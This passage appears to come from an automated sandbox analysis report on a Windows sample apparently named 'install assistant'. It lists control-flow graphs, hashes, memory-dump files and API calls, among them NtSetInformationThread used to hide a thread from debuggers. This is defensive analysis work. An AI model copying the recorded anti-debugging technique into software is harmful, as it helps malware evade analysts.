7923->7927 7928 6cac4083-6cac408a 7923->7928 7924->7927 7930 6cac405a-6cac4063 7925->7930 7926->7924 7932 6cac40be-6cac40c9 7926->7932 7933 6cac3f6b-6cac3f6f 7927->7933 7928->7929 7931 6cac4090 7928->7931 7934 6cac3f64-6cac3f67 7929->7934 7936 6cac4069-6cac406c 7930->7936 7937 6cac40f5-6cac413f 7930->7937 7931->7898 7938 6cac40a7 7931->7938 7932->7927 7939 6cac40cb-6cac40d4 7932->7939 7933->7915 7935 6cac3f69 7934->7935 7935->7933 7940 6cac4144-6cac414b 7936->7940 7941 6cac4072-6cac4077 7936->7941 7937->7935 7938->7927 7939->7938 7942 6cac40d6-6cac40f0 7939->7942 7940->7933 7941->7934 7942->7930
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2323437727.000000006CAC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAC0000, based on PE: true
                                          • Associated: 00000006.00000002.2323412575.000000006CAC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2324901705.000000006CC68000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2326730620.000000006CE32000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 64d5634443ad181005f22af637932356fad69250431fae0fc5457123a08411ec
                                          • Instruction ID: fadbcd298f32499287ae070ca4e7ef502ab346aa760fc3d77ce8b796c6764455
                                          • Opcode Fuzzy Hash: 64d5634443ad181005f22af637932356fad69250431fae0fc5457123a08411ec
                                          • Instruction Fuzzy Hash: 4232D132346B018FC324CF29C8D06E5B7E3EF9131476D8A6CC0EA5BA95D775B48A8B51

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 7969 6cac3a6a-6cac3a85 7970 6cac3a87-6cac3aa7 7969->7970 7971 6cac3aa9-6cac3ab0 7970->7971 7972 6cac3960-6cac3964 7971->7972 7973 6cac396a 7972->7973 7974 6cac3860-6cac388e 7972->7974 7976 6cac3ba1-6cac3bb6 7973->7976 7983 6cac3894-6cac3896 7974->7983 7984 6cac3970-6cac397d 7974->7984 7978 6cac3bc0-6cac3bda call 6cc11470 call 6cc11480 7976->7978 7994 6cac3be0-6cac3bfe 7978->7994 7983->7984 7986 6cac389c-6cac38b9 7983->7986 7988 6cac397f-6cac3989 7984->7988 7989 6cac39f1-6cac39f8 7984->7989 7993 6cac38c0-6cac38c1 7986->7993 7988->7986 7990 6cac398f-6cac3994 7988->7990 7991 6cac39fe-6cac3a03 7989->7991 7992 6cac3ab5-6cac3aba 7989->7992 7996 6cac399a-6cac399f 7990->7996 7997 6cac3b16-6cac3b18 7990->7997 7998 6cac3a09-6cac3a2f 7991->7998 7999 6cac38d2-6cac38d4 7991->7999 7992->7986 8001 6cac3ac0-6cac3ac7 7992->8001 8000 6cac395e 7993->8000 8009 6cac3e7b 7994->8009 8010 6cac3c04-6cac3c11 7994->8010 8003 6cac383b-6cac3855 call 6cc11470 call 6cc11480 7996->8003 8004 6cac39a5-6cac39bf 7996->8004 7997->7993 8005 6cac38f8-6cac3955 7998->8005 8006 6cac3a35-6cac3a3a 7998->8006 8007 6cac3957-6cac395c 7999->8007 8000->7972 8001->7993 8008 6cac3acd-6cac3ad6 8001->8008 8003->7974 8011 6cac3a5a-6cac3a5d 8004->8011 8005->8007 8012 6cac3b1d-6cac3b22 8006->8012 8013 6cac3a40-6cac3a57 8006->8013 8007->8000 8008->7997 8015 6cac3ad8-6cac3aeb 8008->8015 8020 6cac3e81-6cac3ee0 call 6cac3750 GetCurrentThread NtSetInformationThread 8009->8020 8016 6cac3c17-6cac3c20 8010->8016 8017 6cac3ce0-6cac3cea 8010->8017 8011->7971 8018 6cac3b49-6cac3b50 8012->8018 8019 6cac3b24-6cac3b44 8012->8019 8013->8011 8015->8005 8022 6cac3af1-6cac3af8 8015->8022 8025 6cac3dc5 8016->8025 8026 6cac3c26-6cac3c2d 8016->8026 8028 6cac3cec-6cac3d0c 8017->8028 8029 6cac3d3a-6cac3d3c 8017->8029 8018->7993 8027 6cac3b56-6cac3b5d 8018->8027 8019->7970 8047 6cac3eea-6cac3f04 call 6cc11470 call 6cc11480 8020->8047 8023 6cac3afa-6cac3aff 8022->8023 8024 6cac3b62-6cac3b85 8022->8024 8023->8007 8024->8005 8034 6cac3b8b 8024->8034 8035 6cac3dc6 8025->8035 8032 6cac3dc3 8026->8032 8033 6cac3c33-6cac3c3a 8026->8033 8027->7972 8036 6cac3d90-6cac3d95 8028->8036 8037 6cac3d3e-6cac3d45 8029->8037 8038 6cac3d70-6cac3d8d 8029->8038 8032->8025 8041 6cac3e26-6cac3e2b 8033->8041 8042 6cac3c40-6cac3c5b 8033->8042 8034->7976 8043 6cac3dc8-6cac3dcc 8035->8043 8045 6cac3dba-6cac3dc1 8036->8045 8046 6cac3d97-6cac3db8 8036->8046 8044 6cac3d50-6cac3d57 8037->8044 8038->8036 8050 6cac3c7b-6cac3cd0 8041->8050 8051 6cac3e31 8041->8051 8052 6cac3e1b-6cac3e24 8042->8052 8043->7994 8053 6cac3dd2 8043->8053 8044->8035 8045->8032 8049 6cac3dd7-6cac3ddc 8045->8049 8046->8025 8064 6cac3f75-6cac3fa1 8047->8064 8055 6cac3dde-6cac3e17 8049->8055 8056 6cac3e36-6cac3e3d 8049->8056 8050->8044 8051->7978 8052->8043 8057 6cac3e76-6cac3e79 8052->8057 8053->8057 8055->8052 8060 6cac3e5c-6cac3e5f 8056->8060 8061 6cac3e3f-6cac3e5a 8056->8061 8057->8020 8060->8050 8063 6cac3e65-6cac3e69 8060->8063 8061->8052 8063->8043 8063->8057 8068 6cac4020-6cac4026 8064->8068 8069 6cac3fa3-6cac3fa8 8064->8069 8070 6cac402c-6cac403c 8068->8070 8071 6cac3f06-6cac3f35 8068->8071 8072 6cac407c-6cac4081 8069->8072 8073 6cac3fae-6cac3fcf 8069->8073 8074 6cac403e-6cac4058 8070->8074 8075 6cac40b3-6cac40b8 8070->8075 8078 6cac3f38-6cac3f61 8071->8078 8076 6cac40aa-6cac40ae 8072->8076 8077 6cac4083-6cac408a 8072->8077 8073->8076 8079 6cac405a-6cac4063 8074->8079 8075->8073 8081 6cac40be-6cac40c9 8075->8081 8082 6cac3f6b-6cac3f6f 8076->8082 8077->8078 8080 6cac4090 8077->8080 8083 6cac3f64-6cac3f67 8078->8083 8085 6cac4069-6cac406c 8079->8085 8086 6cac40f5-6cac413f 8079->8086 8080->8047 8087 6cac40a7 8080->8087 8081->8076 8088 6cac40cb-6cac40d4 8081->8088 8082->8064 8084 6cac3f69 8083->8084 8084->8082 8089 6cac4144-6cac414b 8085->8089 8090 6cac4072-6cac4077 8085->8090 8086->8084 8087->8076 8088->8087 8091 6cac40d6-6cac40f0 8088->8091 8089->8082 8090->8083 8091->8079
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2323437727.000000006CAC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAC0000, based on PE: true
                                          • Associated: 00000006.00000002.2323412575.000000006CAC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2324901705.000000006CC68000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2326730620.000000006CE32000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID: CurrentThread
                                          • String ID:
                                          • API String ID: 2882836952-0
                                          • Opcode ID: 7b5890bd38e4c5aec97b3a6251f6429efbbd7689eaeec80178cc809aafcecdfe
                                          • Instruction ID: 5ac3a2ac0ff82e1c62578fb99119a8819cfb2e56c4a9327e3d062666d57b5a23
                                          • Opcode Fuzzy Hash: 7b5890bd38e4c5aec97b3a6251f6429efbbd7689eaeec80178cc809aafcecdfe
                                          • Instruction Fuzzy Hash: E251C07124A7018FC3208F29C4807D5B7F3BF95314F698A5DC0E61BA95DB75B48A8B82
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2323437727.000000006CAC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAC0000, based on PE: true
                                          • Associated: 00000006.00000002.2323412575.000000006CAC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2324901705.000000006CC68000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2326730620.000000006CE32000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID: CurrentThread
                                          • String ID:
                                          • API String ID: 2882836952-0
                                          • Opcode ID: 236aec8ba5dc7e53bc337598b211d9d67efbc002a406451b188a83e516410681
                                          • Instruction ID: b83e0b4a57306f89ebffeee17dea327a4772de8a6cbfeb586d64f70d6c3027fe
                                          • Opcode Fuzzy Hash: 236aec8ba5dc7e53bc337598b211d9d67efbc002a406451b188a83e516410681
                                          • Instruction Fuzzy Hash: B751B171209B018BC320CF29C4807D5B7F3BF95314F698A1DC0E65BA95DB75B48A8B92
                                          APIs
                                          • GetCurrentThread.KERNEL32 ref: 6CAC3E9D
                                          • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6CAC3EAA
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2323437727.000000006CAC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAC0000, based on PE: true
                                          • Associated: 00000006.00000002.2323412575.000000006CAC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2324901705.000000006CC68000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2326730620.000000006CE32000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID: Thread$CurrentInformation
                                          • String ID:
                                          • API String ID: 1650627709-0
                                          • Opcode ID: 72c289201ceb3b8d152e3d6a24139a074b8cd59c1f3798e8d68941532d10da6f
                                          • Instruction ID: b06e04a3eeeec710204fc9d02c47c01b5fd2f77d3e5b5b27210d0ea0ea7fa016
                                          • Opcode Fuzzy Hash: 72c289201ceb3b8d152e3d6a24139a074b8cd59c1f3798e8d68941532d10da6f
                                          • Instruction Fuzzy Hash: 2531013124AB01CFD720CF28C8847D6B7B3AF96314F198E1DC0E65BA80DB7870899B52
                                          APIs
                                          • GetCurrentThread.KERNEL32 ref: 6CAC3E9D
                                          • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6CAC3EAA
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2323437727.000000006CAC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAC0000, based on PE: true
                                          • Associated: 00000006.00000002.2323412575.000000006CAC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2324901705.000000006CC68000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2326730620.000000006CE32000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID: Thread$CurrentInformation
                                          • String ID:
                                          • API String ID: 1650627709-0
                                          • Opcode ID: 811b2df456b06115bad2a06226df1c1b1b1523603e43a5db1cf5ebba0c391ce8
                                          • Instruction ID: 0476a9c31ad73192153e2ffd279962991b452052b42c3628042317826c4368ec
                                          • Opcode Fuzzy Hash: 811b2df456b06115bad2a06226df1c1b1b1523603e43a5db1cf5ebba0c391ce8
                                          • Instruction Fuzzy Hash: 3631EF31209B01CFD724CF28C4907E6B7B6AF96308F294E1DC0E65BA85DB7574898B92
                                          APIs
                                          • GetCurrentThread.KERNEL32 ref: 6CAC3E9D
                                          • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6CAC3EAA
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2323437727.000000006CAC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAC0000, based on PE: true
                                          • Associated: 00000006.00000002.2323412575.000000006CAC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2324901705.000000006CC68000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2326730620.000000006CE32000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID: Thread$CurrentInformation
                                          • String ID:
                                          • API String ID: 1650627709-0
                                          • Opcode ID: dee296a3d724d897ce0962706295484e4c6cb2e1010065632a796a2a7c85f00e
                                          • Instruction ID: f8303ae6c18660c93f50b86772ed88b16ca224669d15cbb2203a818dcd9aa228
                                          • Opcode Fuzzy Hash: dee296a3d724d897ce0962706295484e4c6cb2e1010065632a796a2a7c85f00e
                                          • Instruction Fuzzy Hash: 5521F470359701CFD724CF29C8907E677B6AF52308F184E1DC0E64BA90DB75A4889B93
                                          APIs
                                          • OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6CC45130
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2323437727.000000006CAC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAC0000, based on PE: true
                                          • Associated: 00000006.00000002.2323412575.000000006CAC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2324901705.000000006CC68000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2326730620.000000006CE32000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID: ManagerOpen
                                          • String ID:
                                          • API String ID: 1889721586-0
                                          • Opcode ID: e0653267e4c66c3e3ba7a78866f2ee0bc911f2ee1a707312cd03765e75ffe0cf
                                          • Instruction ID: 4bc22fbdd3b6111657df08bca25211985d3c98c00afa118251cd031054350b17
                                          • Opcode Fuzzy Hash: e0653267e4c66c3e3ba7a78866f2ee0bc911f2ee1a707312cd03765e75ffe0cf
                                          • Instruction Fuzzy Hash: B43123B4608341EFD7109F29C584A4ABBF0BB89768F50C95AF988C6360D371C9499B62
                                          APIs
                                          • FindFirstFileA.KERNEL32(?,?), ref: 6CC3AEDC
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2323437727.000000006CAC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAC0000, based on PE: true
                                          • Associated: 00000006.00000002.2323412575.000000006CAC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2324901705.000000006CC68000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2326730620.000000006CE32000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID: FileFindFirst
                                          • String ID:
                                          • API String ID: 1974802433-0
                                          • Opcode ID: 2fc8cd8fc435780ff4febbfb599270ee8764f71c024f2e8a38099088ab559aa0
                                          • Instruction ID: 4257833461ca9710d44da0e7754e4df9e1607e6a0318cbc531439aef341b52ea
                                          • Opcode Fuzzy Hash: 2fc8cd8fc435780ff4febbfb599270ee8764f71c024f2e8a38099088ab559aa0
                                          • Instruction Fuzzy Hash: 80113AB45083609FDB109F69E94450E7BE4BFCA314F149E59F4ACCB6A1E334CC958B62
                                          APIs
                                          • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 6CC1ABA7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2323437727.000000006CAC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAC0000, based on PE: true
                                          • Associated: 00000006.00000002.2323412575.000000006CAC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2324901705.000000006CC68000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2326730620.000000006CE32000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID: FileRead
                                          • String ID: $53N!$53N!$H$I_#]$J_#]$J_#]$Y<Uq$Y<Uq$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$f@n`$f@n`$jinc$|
                                          • API String ID: 2738559852-1563143607
                                          • Opcode ID: e0d9535515b9245b724f1fd1c618b6742a6493f8760951c9c262fd951d7330e2
                                          • Instruction ID: 6b2ae273f17762694d7818f95abefc5803e79c571fbb016f567c3c65414925d5
                                          • Opcode Fuzzy Hash: e0d9535515b9245b724f1fd1c618b6742a6493f8760951c9c262fd951d7330e2
                                          • Instruction Fuzzy Hash: 86625AB060D3818FC724CF1AC490A5ABBE2ABD9314F248D1EE599C7B50E734E9499B42

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 6824 6cc5cad3-6cc5cae3 6825 6cc5cae5-6cc5caf8 call 6cc4f9df call 6cc4f9cc 6824->6825 6826 6cc5cafd-6cc5caff 6824->6826 6842 6cc5ce7c 6825->6842 6828 6cc5cb05-6cc5cb0b 6826->6828 6829 6cc5ce64-6cc5ce71 call 6cc4f9df call 6cc4f9cc 6826->6829 6828->6829 6832 6cc5cb11-6cc5cb37 6828->6832 6847 6cc5ce77 call 6cc50120 6829->6847 6832->6829 6835 6cc5cb3d-6cc5cb46 6832->6835 6838 6cc5cb60-6cc5cb62 6835->6838 6839 6cc5cb48-6cc5cb5b call 6cc4f9df call 6cc4f9cc 6835->6839 6840 6cc5ce60-6cc5ce62 6838->6840 6841 6cc5cb68-6cc5cb6b 6838->6841 6839->6847 6846 6cc5ce7f-6cc5ce82 6840->6846 6841->6840 6845 6cc5cb71-6cc5cb75 6841->6845 6842->6846 6845->6839 6849 6cc5cb77-6cc5cb8e 6845->6849 6847->6842 6852 6cc5cb90-6cc5cb93 6849->6852 6853 6cc5cbdf-6cc5cbe5 6849->6853 6857 6cc5cb95-6cc5cb9e 6852->6857 6858 6cc5cba3-6cc5cba9 6852->6858 6855 6cc5cbe7-6cc5cbf1 6853->6855 6856 6cc5cbab-6cc5cbc2 call 6cc4f9df call 6cc4f9cc call 6cc50120 6853->6856 6859 6cc5cbf3-6cc5cbf5 6855->6859 6860 6cc5cbf8-6cc5cc16 call 6cc547f5 call 6cc547bb * 2 6855->6860 6891 6cc5cd97 6856->6891 6861 6cc5cc63-6cc5cc73 6857->6861 6858->6856 6862 6cc5cbc7-6cc5cbda 6858->6862 6859->6860 6895 6cc5cc33-6cc5cc5c call 6cc5ac69 6860->6895 6896 6cc5cc18-6cc5cc2e call 6cc4f9cc call 6cc4f9df 6860->6896 6864 6cc5cc79-6cc5cc85 6861->6864 6865 6cc5cd38-6cc5cd41 call 6cc619e5 6861->6865 6862->6861 6864->6865 6868 6cc5cc8b-6cc5cc8d 6864->6868 6879 6cc5cdb4 6865->6879 6880 6cc5cd43-6cc5cd55 6865->6880 6868->6865 6872 6cc5cc93-6cc5ccb7 6868->6872 6872->6865 6876 6cc5ccb9-6cc5cccf 6872->6876 6876->6865 6881 6cc5ccd1-6cc5ccd3 6876->6881 6883 6cc5cdb8-6cc5cdd0 ReadFile 6879->6883 6880->6879 6885 6cc5cd57-6cc5cd66 GetConsoleMode 6880->6885 6881->6865 6887 6cc5ccd5-6cc5ccfb 6881->6887 6889 6cc5cdd2-6cc5cdd8 6883->6889 6890 6cc5ce2c-6cc5ce37 GetLastError 6883->6890 6885->6879 6886 6cc5cd68-6cc5cd6c 6885->6886 6886->6883 6892 6cc5cd6e-6cc5cd88 ReadConsoleW 6886->6892 6887->6865 6894 6cc5ccfd-6cc5cd13 6887->6894 6889->6890 6899 6cc5cdda 6889->6899 6897 6cc5ce50-6cc5ce53 6890->6897 6898 6cc5ce39-6cc5ce4b call 6cc4f9cc call 6cc4f9df 6890->6898 6893 6cc5cd9a-6cc5cda4 call 6cc547bb 6891->6893 6900 6cc5cda9-6cc5cdb2 6892->6900 6901 6cc5cd8a GetLastError 6892->6901 6893->6846 6894->6865 6905 6cc5cd15-6cc5cd17 6894->6905 6895->6861 6896->6891 6902 6cc5cd90-6cc5cd96 call 6cc4f9f2 6897->6902 6903 6cc5ce59-6cc5ce5b 6897->6903 6898->6891 6909 6cc5cddd-6cc5cdef 6899->6909 6900->6909 6901->6902 6902->6891 6903->6893 6905->6865 6914 6cc5cd19-6cc5cd33 6905->6914 6909->6893 6911 6cc5cdf1-6cc5cdf5 6909->6911 6918 6cc5cdf7-6cc5ce07 call 6cc5cefe 6911->6918 6919 6cc5ce0e-6cc5ce19 6911->6919 6914->6865 6930 6cc5ce0a-6cc5ce0c 6918->6930 6924 6cc5ce25-6cc5ce2a call 6cc5d1b6 6919->6924 6925 6cc5ce1b call 6cc5ce83 6919->6925 6931 6cc5ce20-6cc5ce23 6924->6931 6925->6931 6930->6893 6931->6930
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2323437727.000000006CAC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAC0000, based on PE: true
                                          • Associated: 00000006.00000002.2323412575.000000006CAC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2324901705.000000006CC68000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2326730620.000000006CE32000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 8Q
                                          • API String ID: 0-4022487301
                                          • Opcode ID: 417339a48ad5e7cbd11a757a102a14a98610325138f01722d3f6ec034a937ea0
                                          • Instruction ID: 859a4c8dfddbb61d4f945fdddf7404070b054a7f3686e3e35301a862bd8c8e5e
                                          • Opcode Fuzzy Hash: 417339a48ad5e7cbd11a757a102a14a98610325138f01722d3f6ec034a937ea0
                                          • Instruction Fuzzy Hash: 11C1E770E042499FDF01EF99C880BADBBB5BF4E318F908159E510A7741E7709975CB68

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 6933 6cc6406c-6cc6409c call 6cc644ec 6936 6cc640b7-6cc640c3 call 6cc6160c 6933->6936 6937 6cc6409e-6cc640a9 call 6cc4f9df 6933->6937 6942 6cc640c5-6cc640da call 6cc4f9df call 6cc4f9cc 6936->6942 6943 6cc640dc-6cc64125 call 6cc64457 6936->6943 6944 6cc640ab-6cc640b2 call 6cc4f9cc 6937->6944 6942->6944 6952 6cc64127-6cc64130 6943->6952 6953 6cc64192-6cc6419b GetFileType 6943->6953 6954 6cc64391-6cc64395 6944->6954 6958 6cc64167-6cc6418d GetLastError call 6cc4f9f2 6952->6958 6959 6cc64132-6cc64136 6952->6959 6955 6cc641e4-6cc641e7 6953->6955 6956 6cc6419d-6cc641ce GetLastError call 6cc4f9f2 CloseHandle 6953->6956 6961 6cc641f0-6cc641f6 6955->6961 6962 6cc641e9-6cc641ee 6955->6962 6956->6944 6970 6cc641d4-6cc641df call 6cc4f9cc 6956->6970 6958->6944 6959->6958 6963 6cc64138-6cc64165 call 6cc64457 6959->6963 6966 6cc641fa-6cc64248 call 6cc617b0 6961->6966 6967 6cc641f8 6961->6967 6962->6966 6963->6953 6963->6958 6976 6cc64267-6cc6428f call 6cc64710 6966->6976 6977 6cc6424a-6cc64256 call 6cc64666 6966->6977 6967->6966 6970->6944 6983 6cc64294-6cc642d5 6976->6983 6984 6cc64291-6cc64292 6976->6984 6977->6976 6982 6cc64258 6977->6982 6985 6cc6425a-6cc64262 call 6cc5b925 6982->6985 6986 6cc642f6-6cc64304 6983->6986 6987 6cc642d7-6cc642db 6983->6987 6984->6985 6985->6954 6990 6cc6438f 6986->6990 6991 6cc6430a-6cc6430e 6986->6991 6987->6986 6989 6cc642dd-6cc642f1 6987->6989 6989->6986 6990->6954 6991->6990 6993 6cc64310-6cc64343 CloseHandle call 6cc64457 6991->6993 6996 6cc64377-6cc6438b 6993->6996 6997 6cc64345-6cc64371 GetLastError call 6cc4f9f2 call 6cc6171f 6993->6997 6996->6990 6997->6996
                                          APIs
                                            • Part of subcall function 6CC64457: CreateFileW.KERNEL32(00000000,00000000,?,6CC64115,?,?,00000000,?,6CC64115,00000000,0000000C), ref: 6CC64474
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC64180
                                          • __dosmaperr.LIBCMT ref: 6CC64187
                                          • GetFileType.KERNEL32(00000000), ref: 6CC64193
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC6419D
                                          • __dosmaperr.LIBCMT ref: 6CC641A6
                                          • CloseHandle.KERNEL32(00000000), ref: 6CC641C6
                                          • CloseHandle.KERNEL32(6CC5B0D0), ref: 6CC64313
                                          • GetLastError.KERNEL32 ref: 6CC64345
                                          • __dosmaperr.LIBCMT ref: 6CC6434C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2323437727.000000006CAC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAC0000, based on PE: true
                                          • Associated: 00000006.00000002.2323412575.000000006CAC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2324901705.000000006CC68000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmpDownload File
